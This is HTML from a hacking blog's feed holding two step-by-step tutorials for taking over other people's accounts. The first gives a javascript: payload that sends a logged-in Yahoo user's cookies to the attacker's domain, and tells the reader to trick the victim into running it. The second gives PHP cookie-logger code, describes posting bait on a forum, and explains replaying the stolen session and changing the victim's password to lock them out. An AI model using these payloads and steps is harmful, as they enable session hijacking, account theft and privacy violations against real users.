&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig1QvdKlURwKJYiSTD_79n6gYuxOrbRUQaqFYNQEblUq7ny9SSi1_p-EjLe9O3bqZUNhUOYwJaIKVZG9dGy-cRPNCJCcbL-UXTmKejvsAC4eFfy6aAQUJ7lcyYLQIHfaeM82GX-1Y_E6w/s1600/3601741.png&quot; imageanchor=&quot;1&quot; style=&quot;color: black; margin-left: 1em; margin-right: 1em; outline: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig1QvdKlURwKJYiSTD_79n6gYuxOrbRUQaqFYNQEblUq7ny9SSi1_p-EjLe9O3bqZUNhUOYwJaIKVZG9dGy-cRPNCJCcbL-UXTmKejvsAC4eFfy6aAQUJ7lcyYLQIHfaeM82GX-1Y_E6w/s1600/3601741.png&quot; style=&quot;background-color: white; border: 1px solid rgb(228, 226, 226); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
Hack Yahoo Account by Cookies Stealing very Simple Way, by Cookies Hijacking.&lt;br /&gt;
Follow Steps and Learn.&lt;br /&gt;
This is very Simple Tutorial and working..&lt;br /&gt;
Step 1:&amp;nbsp;&lt;a href=&quot;http://www.ziddu.com/download/14115417/cookiestealer.rar.html&quot; style=&quot;color: black; outline: none;&quot;&gt;Download this Script&lt;/a&gt;&lt;br /&gt;
Step:2 Download and extract files into your hard drive.&lt;br /&gt;
Step:3 Create a account in any ftp hosting site i suggested&amp;nbsp;&lt;a href=&quot;http://110mb.com/&quot; style=&quot;color: black; outline: none;&quot;&gt;http://110mb.com&lt;/a&gt;&lt;br /&gt;
Step4: Login to your account and upload 4 files into your ftp account...see screenshot below&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNLZW0Nb9oD6jEPS70P4c4cp3Bh1zK7TOEIT07Jj-N35EFpVlLl0HfUTDV-9FEzO8kTnrVeJ5hTmjqpDstFWg2Kph-l5yYbiSd24fqW7t768CBezk0Si_vdBcLC4jwaiz1gcJ0tRqmmA/s1600/ghvhv.jpg&quot; imageanchor=&quot;1&quot; style=&quot;color: black; margin-left: 1em; margin-right: 1em; outline: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;132&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNLZW0Nb9oD6jEPS70P4c4cp3Bh1zK7TOEIT07Jj-N35EFpVlLl0HfUTDV-9FEzO8kTnrVeJ5hTmjqpDstFWg2Kph-l5yYbiSd24fqW7t768CBezk0Si_vdBcLC4jwaiz1gcJ0tRqmmA/s320/ghvhv.jpg&quot; style=&quot;background-color: white; border: 1px solid rgb(228, 226, 226); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Step5:&amp;nbsp;Give this &amp;nbsp;code to victim to run in his browser when he would be logged in to his yahoo account.&amp;nbsp;&lt;b&gt;Yahoo.php&lt;/b&gt;&amp;nbsp;is basically cookie stealing script and hacked.php executes the stolen cookies in browser.&lt;br /&gt;
Stolen cookies get stored in directory &#39;&lt;b&gt;cookies&lt;/b&gt;&#39;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #660000;&quot;&gt;javascript:document.location=&#39;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://yourdomain.com/yahoo.php?ex=&quot; title=&quot;Linkification: http://yourdomain.com/yahoo.php?ex=&quot;&gt;http://yourdomain.com/yahoo.php?ex=&lt;/a&gt;&#39;.concat(escape(document.cookie));&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
He would again redirected to his yahoo account.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step6.&lt;/b&gt;&amp;nbsp;Open the hacked.php . The password is &#39;&lt;b&gt;explore&lt;/b&gt;&#39;.&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdIkg9f9SfF7hBltmYYoq8vinT-TDz-mePwMBECcybEy8JApOSUdokzeGTzBDEwQvJidEz-0R9N6WMA05mxc6U7OSjaXpd1vo5MzBpX1hsUDE5r1U-ydZ6J6KJgO2AegLtfkn5aJjgmoU/s1600/hack1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;color: black; margin-left: 1em; margin-right: 1em; outline: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;65&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdIkg9f9SfF7hBltmYYoq8vinT-TDz-mePwMBECcybEy8JApOSUdokzeGTzBDEwQvJidEz-0R9N6WMA05mxc6U7OSjaXpd1vo5MzBpX1hsUDE5r1U-ydZ6J6KJgO2AegLtfkn5aJjgmoU/s400/hack1.jpg&quot; style=&quot;background-color: white; border: 1px solid rgb(228, 226, 226); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
You must have got the username of victim&#39;s&amp;nbsp;account. Simply Click on it 
and it would take you to inbox of victim&#39;s yahoo account without&amp;nbsp;asking 
for any password&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Sudz6udrNxdByS7FDWEnkWnbuJZrm4jspvN2mk8FKiMJhf1ih9hmaUvHB6We3hK9hN6yzxbcslBvgDTVB63dB_bvEpa39Vi6HhJW3DWAT9VtxbeoRllSSRj3Sg2KVk_r-hWR55PFuM0/s1600/hack2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;color: black; margin-left: 1em; margin-right: 1em; outline: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;49&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Sudz6udrNxdByS7FDWEnkWnbuJZrm4jspvN2mk8FKiMJhf1ih9hmaUvHB6We3hK9hN6yzxbcslBvgDTVB63dB_bvEpa39Vi6HhJW3DWAT9VtxbeoRllSSRj3Sg2KVk_r-hWR55PFuM0/s320/hack2.jpg&quot; style=&quot;background-color: white; border: 1px solid rgb(228, 226, 226); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
You can also read this tutorial about&amp;nbsp;&lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/how-to-make-cookie-logger-cookies.html&quot;&gt;How To Make Cookie Logger/ Cookie Stealer&lt;/a&gt;.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/898875900251533740/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/yahoo-account-hacking-hack-yahoo.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/898875900251533740'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/898875900251533740'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/yahoo-account-hacking-hack-yahoo.html' title='Yahoo Account Hacking / Hack yahoo Account by Cookies stealing to browser / Session Hijacking'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig1QvdKlURwKJYiSTD_79n6gYuxOrbRUQaqFYNQEblUq7ny9SSi1_p-EjLe9O3bqZUNhUOYwJaIKVZG9dGy-cRPNCJCcbL-UXTmKejvsAC4eFfy6aAQUJ7lcyYLQIHfaeM82GX-1Y_E6w/s72-c/3601741.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-4761770021741023867</id><published>2013-01-05T05:36:00.000-08:00</published><updated>2013-07-28T03:01:04.731-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="cookie logger"/><category scheme="http://www.blogger.com/atom/ns#" term="Cookies Stealing"/><category scheme="http://www.blogger.com/atom/ns#" term="cookies stealing tutorial"/><title type='text'>How to Make Cookie Logger / Cookies Stealing Tutorial</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirIElGhSZmxssRR35AWPsNbvy6u2Ye0E2ZWlaklZKZKwsonFSJwVehcPUniZrb8mtMyHus6ddltmVQ0MdAt-LCRW1dZdXwBVI8b4FyD_OJoWLdGxAI7Vm2NcvcEH2m4OTe25nKRge5M5fC/s1600/internet-cookies.jpg&quot; style=&quot;color: black; margin-left: 1em; margin-right: 1em; outline: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirIElGhSZmxssRR35AWPsNbvy6u2Ye0E2ZWlaklZKZKwsonFSJwVehcPUniZrb8mtMyHus6ddltmVQ0MdAt-LCRW1dZdXwBVI8b4FyD_OJoWLdGxAI7Vm2NcvcEH2m4OTe25nKRge5M5fC/s400/internet-cookies.jpg&quot; style=&quot;background-color: white; border: 1px solid rgb(228, 226, 226); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: x-small;&quot;&gt;What is cookie logger ?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;In my previous post i explained &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/yahoo-account-hacking-hack-yahoo.html&quot;&gt;How To Hack Yahoo Account Using Cookie Stealing To Browser&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Today i will explained how to make your own cookie logger and hack victims account. A&amp;nbsp;Cookie Logger&amp;nbsp;is a Script that is Used to Steal anybody’s Cookies and 
stores it into a Log File from where you can read the Cookies of the 
Victim.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;How to make your own Cookie Logger…Hope you will enjoy Reading it …&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Step 1: Save the notepad file from the link below and Rename it as Fun.gif&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;Click To Download Script&amp;nbsp;&lt;a href=&quot;http://www.ziddu.com/download/15254989/script2.txt.html&quot; style=&quot;color: black; outline: none;&quot;&gt;here&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;$filename = “logfile.txt”;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;if (isset($_GET[&quot;cookie&quot;]))&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;if (!$handle = fopen($filename, ‘a’))&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;echo “Temporary Server Error,Sorry for the inconvenience.”;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;exit;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;else&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;if (fwrite($handle, “rn” . $_GET[&quot;cookie&quot;]) === FALSE)&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;echo “Temporary Server Error,Sorry for the inconvenience.”;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;exit;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;echo “Temporary Server Error,Sorry for the inconvenience.”;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;fclose($handle);&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;exit;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;echo “Temporary Server Error,Sorry for the inconvenience.”;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;exit;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Step 3: Create a new Notepad File and Save it as logfile.txt&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Step 4: Upload this file to your server&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;cookielogger.php -&amp;gt; &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.yoursite.com/cookielogger.php&quot; title=&quot;Linkification: http://www.yoursite.com/cookielogger.php&quot;&gt;http://www.yoursite.com/cookielogger.php&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;logfile.txt -&amp;gt; &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.yoursite.com/logfile.txt&quot; title=&quot;Linkification: http://www.yoursite.com/logfile.txt&quot;&gt;http://www.yoursite.com/logfile.txt&lt;/a&gt;&amp;nbsp;&lt;span style=&quot;color: red;&quot;&gt;(chmod 777)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;fun.gif -&amp;gt; &lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.yoursite.com/fun.gif&quot; title=&quot;Linkification: http://www.yoursite.com/fun.gif&quot;&gt;http://www.yoursite.com/fun.gif&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;If you don’t have any Website then you can use the following Website to get a Free Website which has php support :&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a class=&quot;linkification-ext&quot; href=&quot;http://0fees.net/&quot; title=&quot;Linkification: http://0fees.net&quot;&gt;http://0fees.net&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Step 5: Go to the victim forum and insert this code in the signature or a post :&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;Click to download&amp;nbsp;&amp;nbsp;&lt;a href=&quot;http://www.ziddu.com/download/15254989/script2.txt.html&quot; style=&quot;color: black; outline: none;&quot;&gt;here&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Step
 6: When the victim see the post he view the image u uploaded but when 
he click the image he has a Temporary Error and you will get his cookie 
in log.txt . The Cookie Would Look as Follows:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D;
 phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Step
 7: To get the access to the Victim’s Account you need to replace your 
cookies with the Victim’s Cookie. You can use a Cookie Editor for this. 
The string before “=” is the name of the cookie and the string after “=”
 is its value. So Change the values of the cookies in the cookie Editor.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Step
 8: Goto the Website whose Account you have just hacked and You will 
find that you are logged in as the Victim and now you can change the 
victim’s account information.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Note
 : Make Sure that from Step 6 to 8 the Victim should be Online because 
you are actually Hijacking the Victim’s Session So if the Victim clicks 
on Logout you will also Logout automatically but once you have changed 
the password then you can again login with the new password and the 
victim would not be able to login.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
